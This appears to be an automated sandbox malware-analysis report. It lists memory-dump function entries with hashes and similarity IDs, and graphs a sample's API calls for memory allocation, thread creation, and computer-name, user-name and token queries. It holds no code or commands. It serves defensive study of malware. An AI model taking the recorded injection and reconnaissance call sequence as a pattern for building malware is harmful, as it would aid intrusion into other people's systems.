                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08E3C7FE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 71f227eed9405c51e73e62c635adb2cfa41daf5fbae0abf7360d189c2b07dfc5
                                                                                                                                                                      • Instruction ID: 6e55eab2d7d4a6f525a2c2c8b3a348e806bbb88c96909f9a0f2f2b56be18e340
                                                                                                                                                                      • Opcode Fuzzy Hash: 71f227eed9405c51e73e62c635adb2cfa41daf5fbae0abf7360d189c2b07dfc5
                                                                                                                                                                      • Instruction Fuzzy Hash: EE112976D003499FDB20DFAAC845BDEBBF5EB88310F148419E515A7250C779A940CFA0
                                                                                                                                                                      Function 08E3C608 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 113e7f7ce8648c6b5fe31848f8eb1bc4a117bd54cf271c1fcba4a442585b43b3
                                                                                                                                                                      • Instruction ID: bdf7fb2d06bcde1c0780435ee7e873ef5f22f584139dd7533a293ef920e928ee
                                                                                                                                                                      • Opcode Fuzzy Hash: 113e7f7ce8648c6b5fe31848f8eb1bc4a117bd54cf271c1fcba4a442585b43b3
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E113AB1D003498FDB20DFAAC4457AEFBF5EB88724F248419D529A7240CB79A945CFA4
                                                                                                                                                                      Function 08E3FC20 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 08E3FC85
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      • Opcode ID: afdf5c5f697e700679762bc99371d0776e398b37458c0a1db21aabb9c2a0f5b7
                                                                                                                                                                      • Instruction ID: 48b2d9336799b11df53f0e546502e06cfc7b77ad1f03b3a6fa8b5d4bda1b4d0c
                                                                                                                                                                      • Opcode Fuzzy Hash: afdf5c5f697e700679762bc99371d0776e398b37458c0a1db21aabb9c2a0f5b7
                                                                                                                                                                      • Instruction Fuzzy Hash: EB11E3B5C003599FDB10DF9AC485BDEBFF8EB48321F108459E958A7210D375A944CFA5
                                                                                                                                                                      Function 0086E5E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0086E646
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1546244244.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_860000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                      • Opcode ID: 2221d54857c37b0810f38a976b32454739342d81f2d05c06a69d7a881d58bf26
                                                                                                                                                                      • Instruction ID: a25990cb574da071ac2b78d333a7b9f3f31092dc97361cbc48abbafb4e1f99bf
                                                                                                                                                                      • Opcode Fuzzy Hash: 2221d54857c37b0810f38a976b32454739342d81f2d05c06a69d7a881d58bf26
                                                                                                                                                                      • Instruction Fuzzy Hash: AE110FB9C002498FDB20DF9AC844A9EFBF4EB88320F11842AD529A7210C379A545CFA1
                                                                                                                                                                      Function 08E394F8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 08E3FC85
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      • Opcode ID: 405f34df75fe5aa73e2609fe9926e9ebaa4a088cf8d95d36d00af4256a49afe5
                                                                                                                                                                      • Instruction ID: 6074c0fe863f4540579f0e7ad41d453e2bb44647b88be2e7d611ab19fb1a9278
                                                                                                                                                                      • Opcode Fuzzy Hash: 405f34df75fe5aa73e2609fe9926e9ebaa4a088cf8d95d36d00af4256a49afe5
                                                                                                                                                                      • Instruction Fuzzy Hash: 1411F5B5800359AFDB10DF9AC549BEEBBF8FB48320F108419E918A7250D375A944CFA5
                                                                                                                                                                      Function 007DD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1543349119.00000000007DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7dd000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ccb32afc19210e8c4e54280b461b3e3231bf68e0ffc03d30f245ab53fdca45d5
                                                                                                                                                                      • Instruction ID: b983a4b508c8d5a57cd878b58e035c5c02e5698af364a9cbf77ad48f83467b64
                                                                                                                                                                      • Opcode Fuzzy Hash: ccb32afc19210e8c4e54280b461b3e3231bf68e0ffc03d30f245ab53fdca45d5
                                                                                                                                                                      • Instruction Fuzzy Hash: 3D21F471504240DFDB25DF14E9C0B26BF75FB94318F24C56AE8060A356C33ADC66CBA2
                                                                                                                                                                      Function 007ED01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1543458516.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7ed000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 44fc918203370577ffa5a0699f13e43ea08077780067373ea2856eea6fd82d3b
                                                                                                                                                                      • Instruction ID: 13adf3fbc7a56973b1f7217784f4ebfbcdb7a45d9d38951b5fd75cbb0f3bfad9
                                                                                                                                                                      • Opcode Fuzzy Hash: 44fc918203370577ffa5a0699f13e43ea08077780067373ea2856eea6fd82d3b
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E21F275605384DFDB24DF14D9C4B16BB65FB88314F28C56DD84A4B286C33ADC47CA62
                                                                                                                                                                      Function 007ED1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1543458516.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7ed000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bf2f2cb85eb72b85e6496fcb50583b80056cc5f4af2d5bb3e62a22feb0ea0ae4
                                                                                                                                                                      • Instruction ID: ff2f65689bd58d9b114c4cb397967a37c680a3cc00a3e8c27ac8cc95b0e2422f
                                                                                                                                                                      • Opcode Fuzzy Hash: bf2f2cb85eb72b85e6496fcb50583b80056cc5f4af2d5bb3e62a22feb0ea0ae4
                                                                                                                                                                      • Instruction Fuzzy Hash: D9210775A05384DFDB25DF11D9C0B15BB69FB88314F20C56DD9494F292C33ADC46CA61
                                                                                                                                                                      Function 069309A0 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1617472167.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_6930000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c82ad7daf9bad496951659986f71fc184c29cea5a30918f8471be3e37f027d3b
                                                                                                                                                                      • Instruction ID: a2468eb2c39e02f9a1da25f5aeea2a220078a1bb31bea7f583f440dd30f27786
                                                                                                                                                                      • Opcode Fuzzy Hash: c82ad7daf9bad496951659986f71fc184c29cea5a30918f8471be3e37f027d3b
                                                                                                                                                                      • Instruction Fuzzy Hash: CD114970E0121ACFDB58DFA9C444AAEF7F1EF88310F15C46AD418AB761DB349942CB90
                                                                                                                                                                      Function 007DD4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1543349119.00000000007DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7dd000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                                                                                                      • Instruction ID: 36b9fe925880d5b9fe41563f8405a8a95ddb6b94afa985f37b1a4e82ccccf0d9
                                                                                                                                                                      • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                                                                                                      • Instruction Fuzzy Hash: 9711E676504280DFCB15CF14D5C4B16BF72FB94324F24C6AAD84A0B756C33AD866CBA1
                                                                                                                                                                      Function 069317C0 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1617472167.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_6930000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3dff822d5fcd68fefa8ea8579b330b7ca3beba86a6eed52c6b1f329e3e5c2d68
                                                                                                                                                                      • Instruction ID: 3e9b99e9e0483e1ff8e0c35055291d321e32d58a184a5ef145a0b4c91c5c5650
                                                                                                                                                                      • Opcode Fuzzy Hash: 3dff822d5fcd68fefa8ea8579b330b7ca3beba86a6eed52c6b1f329e3e5c2d68
                                                                                                                                                                      • Instruction Fuzzy Hash: E911C2748043489FDB51DF78C804A9B7FB2EF86300B55C5AAD045CB662C735C846CF65
                                                                                                                                                                      Function 06931859 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1617472167.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_6930000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d3c578f0d36397d20b48ca50ae869806f8b0355e78cc7b6cfca6c8d98cb18d39
                                                                                                                                                                      • Instruction ID: d5a7fc1bf1726f3e47cc63a72a49f9f4e9ecf2d2c30c6933609a625480fb8f71
                                                                                                                                                                      • Opcode Fuzzy Hash: d3c578f0d36397d20b48ca50ae869806f8b0355e78cc7b6cfca6c8d98cb18d39
                                                                                                                                                                      • Instruction Fuzzy Hash: 3611F374E0121ACFDB58DF69C044AAEBBF2AF88310F258469D418AB761DB349942CB90
                                                                                                                                                                      Function 007ED1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1543458516.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7ed000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                                                                                      • Instruction ID: 27e1994989ea866ff78aff39e71e152f36db96f7b868016ccd9d23ae3b3780a3
                                                                                                                                                                      • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                                                                                      • Instruction Fuzzy Hash: 9E119D79504280DFCB15DF14D6C4B15FBB2FB88324F24C6ADD9494B696C33AD84ACB61
                                                                                                                                                                      Function 007ED017 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1543458516.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7ed000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                                                                                      • Instruction ID: 2da3c7b9c748292e228e61fd6f7230c1de197320bb47b8d9695851834487be7a
                                                                                                                                                                      • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                                                                                      • Instruction Fuzzy Hash: 07119075504284DFCB15CF14D5C4B15FB62FB48314F28C6ADD8494B656C33AD85BCB61
                                                                                                                                                                      Function 007DD745 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1543349119.00000000007DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7dd000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 68b51e87b8844df90eb64a6def0c3483af4277d91de74d1eff96654341a0101a
                                                                                                                                                                      • Instruction ID: 43131533a5441134c0c9c95b6ab2f27f0434f6ee0419ca20f997b0fa157dc4c8
                                                                                                                                                                      • Opcode Fuzzy Hash: 68b51e87b8844df90eb64a6def0c3483af4277d91de74d1eff96654341a0101a
                                                                                                                                                                      • Instruction Fuzzy Hash: 4D01F231508344AAE7309A21CD84B26BFA8DF81335F18C5ABED080A382C27D9C41CAB2
                                                                                                                                                                      Function 007DD744 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1543349119.00000000007DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_7dd000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 7680c53ab08b4b8d4ef5a68cd49558f235be62b756c96faadad275174bf9f560
                                                                                                                                                                      • Instruction ID: 3d056cf9698b28c543f79485cb355941e21d1b2689e25512cf374224b9a073aa
                                                                                                                                                                      • Opcode Fuzzy Hash: 7680c53ab08b4b8d4ef5a68cd49558f235be62b756c96faadad275174bf9f560
                                                                                                                                                                      • Instruction Fuzzy Hash: 77F06271504344AEE7249E15C988B62FFA8EB91734F18C59BED084A386C2799C44CBB1
                                                                                                                                                                      Function 06931818 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1617472167.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_6930000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9ac139a17260a9f8011cc914551e4d0dbb86cc5b14b58831aeeb5be086a07654
                                                                                                                                                                      • Instruction ID: b822a2934c8193a5c2b4b5e668c92f6d763a2f32b3a64e19614b70a6fea944d2
                                                                                                                                                                      • Opcode Fuzzy Hash: 9ac139a17260a9f8011cc914551e4d0dbb86cc5b14b58831aeeb5be086a07654
                                                                                                                                                                      • Instruction Fuzzy Hash: 26D0ECB0C402199ED780EFB9880176FBAF5AB84300F5088698014E2601EF7442008B95

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:4.1%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:97.5%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:79
                                                                                                                                                                      Total number of Limit Nodes:5
                                                                                                                                                                      execution_graph 5818 4c55ef 5821 4c55ac 5818->5821 5820 4c55e9 5821->5820 5822 4e3870 5821->5822 5823 4e3876 5822->5823 5825 4e3893 5823->5825 5826 4e3720 5823->5826 5825->5821 5829 4d0c42 5826->5829 5827 4e37dd 5827->5825 5828 4ce050 VirtualAlloc 5828->5829 5829->5826 5829->5827 5829->5828 5807 4c5b09 5808 4c5b16 5807->5808 5809 4c5cdf CreateThread 5808->5809 5810 4c5c01 5808->5810 5809->5810 5811 4c54a0 5809->5811 5830 4c55e4 5832 4c55ac 5830->5832 5831 4e3870 VirtualAlloc 5831->5832 5832->5830 5832->5831 5833 4c55e9 5832->5833 5725 4c5b87 CreateThread 5726 4c5b1c 5725->5726 5731 4c5810 5725->5731 5727 4c5cdf CreateThread 5726->5727 5728 4c5c01 5726->5728 5727->5728 5729 4c54a0 5727->5729 5730 4c54b5 5729->5730 5732 4c5822 5731->5732 5733 4c5b00 5734 4c5bba 5733->5734 5741 4d52c0 5734->5741 5736 4c5bc7 5740 4c5bde 5736->5740 5746 4e0080 5736->5746 5742 4d52c6 5741->5742 5744 4d52ce 5741->5744 5742->5744 5760 4ce050 5742->5760 5744->5736 5751 4e0089 5746->5751 5747 4e03e0 GetComputerNameW 5747->5751 5748 4e0181 VirtualFree 5748->5751 5749 4ce050 VirtualAlloc 5749->5751 5750 4e03bf GetUserNameW 5750->5751 5751->5747 5751->5748 5751->5749 5751->5750 5752 4e04d6 GetComputerNameW 5751->5752 5753 4c5c7b 5751->5753 5752->5751 5754 4c8070 5753->5754 5758 4c8075 5754->5758 5755 4c8186 CloseHandle 5755->5758 5756 4c80ca GetTokenInformation 5756->5758 5757 4c81ad GetTokenInformation 5757->5758 5758->5755 5758->5756 5758->5757 5759 4c80a7 5758->5759 5759->5740 5761 4ce0c3 5760->5761 5762 4ce0d8 VirtualAlloc 5761->5762 5762->5761 5774 4c5860 5775 4d52c0 VirtualAlloc 5774->5775 5776 4c5869 5775->5776 5777 4e0080 5 API calls 5776->5777 5778 4c587d 5777->5778 5779 4c8070 3 API calls 5778->5779 5780 4c5870 5779->5780 5769 4c5b42 5770 4c5b07 5769->5770 5770->5769 5771 4c5b68 5770->5771 5772 4c5cdf CreateThread 5770->5772 5772->5771 5773 4c54a0 5772->5773 5781 4c8090 5783 4c8075 5781->5783 5782 4c8186 CloseHandle 5782->5783 5783->5782 5784 4c80ca GetTokenInformation 5783->5784 5785 4c81ad GetTokenInformation 5783->5785 5786 4c80a7 5783->5786 5784->5783 5785->5783 5834 4c57f0 5837 4c55ac 5834->5837 5835 4c55e9 5836 4e3870 VirtualAlloc 5836->5837 5837->5835 5837->5836 5763 4c81b1 5767 4c8075 5763->5767 5764 4c8186 CloseHandle 5764->5767 5765 4c80ca GetTokenInformation 5765->5767 5766 4c81ad GetTokenInformation 5766->5767 5767->5764 5767->5765 5767->5766 5768 4c80a7 5767->5768

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 004C52A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 292 4c52a0-4c52a5 293 4c532e-4c533f 292->293 294 4c52ab-4c52f5 292->294 298 4c536b-4c5390 293->298 294->293 297 4c52f7 294->297 299 4c53fe 297->299 305 4c5392-4c539a 298->305 306 4c53c3 298->306 301 4c5404-4c540e 299->301 302 500d4c-500d4e 299->302 304 4c5424 301->304 307 4c542a 304->307 308 4c539b 304->308 305->308 307->308 309 4c5430-4c5443 307->309 310 4c539d-4c53a1 308->310 311 4c5413-4c5419 308->311 312 4c53a7 310->312 313 4c52b0-4c52b5 310->313 312->313 314 4c53ad 312->314 315 4c53af-4c53f1 314->315 316 4c53f3-4c53f9 314->316 315->311 315->316 316->299 319 4c5322-4c5328 316->319 320 4c532a 319->320 321 4c5355 319->321 320->321 322 4c532c 320->322 324 4c52e8-4c5363 321->324 325 4c52d1-4c52e7 321->325 322->293 328 4c5365 324->328 329 4c53d1-4c53d5 324->329 325->324 328->329 331 4c5367-4c5369 328->331 329->310 330 4c53d7 329->330 333 4c534b 330->333 334 4c5400-4c540e 330->334 331->298 333->334 335 4c5351-4c5353 333->335 334->304 335->321
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 004C53C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction ID: 2f833a90126d5643c6102f08238bb98db82194bda913623d6d0b4f08585c3cbd
                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction Fuzzy Hash: DA41E85D40DED58FD3AA42245464F7E6BD09B113A2F9901DFD882862F2D19C3CC2972F
                                                                                                                                                                      Function 004E0080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 4e0080-4e0286 2 4e028c 0->2 3 4e0099-4e0575 0->3 4 4e0445 2->4 7 4e057b 3->7 8 4e0155 3->8 4->3 6 4e044b-4e0457 4->6 10 4e0458-4e0472 GetComputerNameW 6->10 7->8 11 4e0581-4e0587 7->11 9 4e02ef-4e0495 call 4ce050 * 2 8->9 9->10 53 4e043e 9->53 15 4e03ee-4e03f4 10->15 16 4e024c-4e0253 10->16 13 4e058b 11->13 18 4e058c-4e0591 13->18 19 4e0181 VirtualFree 13->19 41 4e00da-4e023f 15->41 42 4e03fa 15->42 22 4e01e6 16->22 23 4e0255 16->23 20 4e04ab-4e04af 18->20 21 4e0597 18->21 25 4e01a8-4e02ac call 4f7164 19->25 45 4e04c7 20->45 21->20 26 4e059d 21->26 30 4e01ec-4e0313 call 4f715c 22->30 31 4e02b1-4e02be 22->31 27 4e02d3 23->27 25->31 26->20 27->22 40 4e02d9 27->40 50 4e0318-4e031e 30->50 37 4e03bf-4e03d9 GetUserNameW 31->37 38 4e02c4 31->38 47 4e0331 37->47 38->37 48 4e02ca 38->48 40->9 41->16 54 4e0241-4e024a 41->54 42->41 49 4e0400 42->49 58 4e04cc-4e04e6 call 4f9970 GetComputerNameW 45->58 51 4e0337 47->51 52 4e0171 47->52 48->27 55 4eb1ee-4eb49f 49->55 56 4e0568-4e056b 50->56 57 4e0324 50->57 51->52 61 4e033d 51->61 59 4e013f-4e0146 52->59 60 4e0173 52->60 53->4 54->16 54->31 56->58 57->56 63 4e032a 57->63 69 4e04ec-4e0514 58->69 70 4e0131 58->70 59->13 65 4e0230 60->65 66 4e05d0-4e05d9 61->66 63->47 65->45 68 4e0236-4e05c2 65->68 66->55 68->45 74 4e05c8-4e05c9 68->74 69->56 72 4e0089-4e008c 70->72 73 4e0137 70->73 72->25 77 4e0092 72->77 73->72 75 4e013d 73->75 74->66 75->19 75->59 77->25 78 4e0098 77->78 78->3
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000018.00000002.2615968689.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_24_2_4c0000_Locator.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                      • Opcode ID: 1be751eabdcc98312fb74eeb5f9fdb67a349bdf8bc590077ef3f4a702409fd86
                                                                                                                                                                      • Instruction ID: 1e672f5d50371c57fb52acf9ab2c96a00b5cdc20f71489d474d73c63abef4965
                                                                                                                                                                      • Opcode Fuzzy Hash: 1be751eabdcc98312fb74eeb5f9fdb67a349bdf8bc590077ef3f4a702409fd86
                                                                                                                                                                      • Instruction Fuzzy Hash: 99D17931408B4D8BC724EF59D8457EAB3E1FBA0301F18461FD856C7264DAB8DA8587C7
                                                                                                                                                                      Function 004C8070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
